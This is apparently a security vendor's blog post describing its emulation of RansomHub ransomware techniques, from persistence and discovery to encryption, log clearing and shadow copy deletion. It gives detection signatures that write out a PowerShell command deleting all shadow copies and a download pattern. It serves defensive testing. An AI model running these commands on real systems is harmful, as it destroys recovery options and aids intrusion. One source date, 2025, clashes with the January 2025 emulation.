RansomHub is a Ransomware-as-a-Service (RaaS) operation that emerged in early 2024, targeting organizations worldwide. Like many ransomware families, it follows a double-extortion model, encrypting victims’ data while also stealing sensitive information to pressure them into paying a ransom. The encryptor is developed using either C++ or Go, with multiple versions designed to target various systems, including Windows, Linux, and ESXi servers. A distinctive characteristic of RansomHub is that its binary requires a password to execute and encrypt files, making sample analysis more challenging for researchers.

There are notable similarities between RansomHub and Knight ransomware encryptors. Moreover, RansomHub emerged around the same time that Knight’s source code was offered for sale on the dark web and its leak site became inaccessible, suggesting it may be a successor to Knight ransomware. Additionally, there are links to BlackCat/ALPHV operations as well, indicating possible ties to previous ransomware groups.

AttackIQ previously emulated RansomHub ransomware with an emulation released on September 5, 2024, in response to CISA Advisory AA24-242A. This emulation has since been updated to incorporate newly observed behaviors associated with RansomHub ransomware.

AttackIQ has released a new attack graph composed of the several Tactics, Techniques and Procedures (TTPs) exhibited by RansomHub ransomware during its most recent activities to help customers validate their security controls and their ability to defend against this sophisticated threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new attack graph in the AttackIQ Security Optimization Platform, security teams will be able to:

• Evaluate security control performance against baseline behaviors associated with RansomHub ransomware.
• Assess their security posture against a ransomware family targeting organizations worldwide.
• Continuously validate detection and prevention pipelines against a playbook similar to those used by currently active ransomware groups.

[Malware Emulation] RansomHub – 2025-01 – Associated Tactics, Techniques and Procedures (TTPs)

This emulation replicates the sequence of behaviors associated with the deployment of RansomHub ransomware on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.

This emulation is based on Trend Micro’s report released on December 20, 2025, and supported by the technical analysis published by Arete in January 2025.

Initial Access & Persistence – Ransomware Deployment and Establishing Persistence

This stage begins with the deployment of RansomHub ransomware. Initially, it attempts to escalate privileges by listing active access tokens. Next, it establishes persistence through registry run keys and enables automatic login for an administrative account. Finally, it allows remote symbolic links to point to local resources.

Ingress Tool Transfer (T1105): These scenarios download to memory and save to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Access Token Manipulation (T1134): This scenario lists active access tokens that could be impersonated by another process. This method is commonly used to escalate privileges.

Boot or Logon Autostart Execution: Registry Run Keys (T1547.001): This scenario acquires persistence by setting the HKLM\Software\Microsoft\Windows\CurrentVersion\Run registry key that Windows uses to identify what applications should be run at system startup.

Modify Registry ( T1112 ): This scenario modifies the AutoAdminLogon registry value under the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon to enable automatic login with an administrative account.

Impair Defenses: Disable or Modify Tools (T1562.001): This scenario executes the fsutil command to enable the Remote to Local (R2L) and Remote to Remote (R2R) symbolic links that allows malware to follow shortcuts with remote paths.

Discovery – Local System Reconnaissance

This stage focuses on system information and account discovery. It collects extensive details about the system, including running processes and services, user accounts, environmental variables, physical drives and volume information.

System Information Discovery (T1082): This scenario calls the GetSystemInfo Windows native API call to retrieve system information. This can be used to detect sandboxes, create unique identifiers, and adjust execution behaviors.

System Information Discovery (T1082): This scenario executes the GetComputerNameExW Windows native API call to retrieve a NetBIOS or DNS name associated with the local computer.

System Information Discovery (T1082): This scenario executes the NtQuerySystemInformation Windows native API call to identify security controls or other software running on the system.

System Information Discovery (T1082): This scenario executes the GetEnvironmentStrings Windows native API call to discover environmental variables, usually used to fingerprint the system or search for stored passwords and secrets.

Account Discovery: Local Account (T1087.001): This scenario executes the NetUserEnum Windows native API call to enumerate user accounts on the system.

Process Discovery (T1057): This scenario executes the CreateToolhelp32SnapshotWindows native API call to receive a list of running processes and iterates through each process object with Process32FirstW and Process32NextW.

System Service Discovery (T1007): This scenario executes the EnumServicesStatus Windows native API call to gather critical information about configured services on a compromised system, such as service name, service display name, and current service status.

Peripheral Device Discovery (T1120): This scenario executes the GetLogicalDriveStringsW Windows native API call to retrieve information about the system’s physical drives.

System Information Discovery (T1082): This scenario executes the GetVolumeInformationA Windows native API call for each drive letter to retrieve the volume name, serial number, and file system type.

System Information Discovery (T1082): This scenario calls the GetVolumeNameForVolumeMountPointA Windows native API function for each drive letter to retrieve the volume GUID path.

Network Share Discovery (T1135): This scenario executes the NetShareEnum Windows native API call to enumerate network shares from the local computer.

Impact – RansomHub File Encryption

This stage begins with the enumeration and systematic traversal of the file system. Next, it encrypts files using a combination of Curve25519 and AES. Finally, it clears Windows event logs and deletes volume shadow copies using Windows Management Instrumentation (WMI) objects.

File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows native API calls to enumerate the file system.

Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by RansomHub ransomware.

Indicator Removal: Clear Windows Event Logs (T1070.001): The scenario will use the wevtutil.exe binary to clear event logs from the system.

Inhibit System Recovery (T1490): This scenario executes the Get-WMIObject Win32_ShadowCopy PowerShell command to delete a recent Volume Shadow Copy created by the assessment template.

Detection and Mitigation Opportunities

With so many different techniques being used by threat actors, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

• M1031 – Network Intrusion Prevention

2. Inhibit System Recovery (T1490):

Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.

2a. Detection

Detecting deletion of Volume Shadow Copies is usually the first step that occurs and can be detected by looking at the command line activity

Process Name == powershell.exe
Command Line == “Get-WmiObject Win32_ShadowCopy | ForEach-Object ($_.Delete();)”

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery

Wrap Up

In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by RansomHub ransomware operators. With data generated from continuous testing and the use of this attack graph, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Proactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.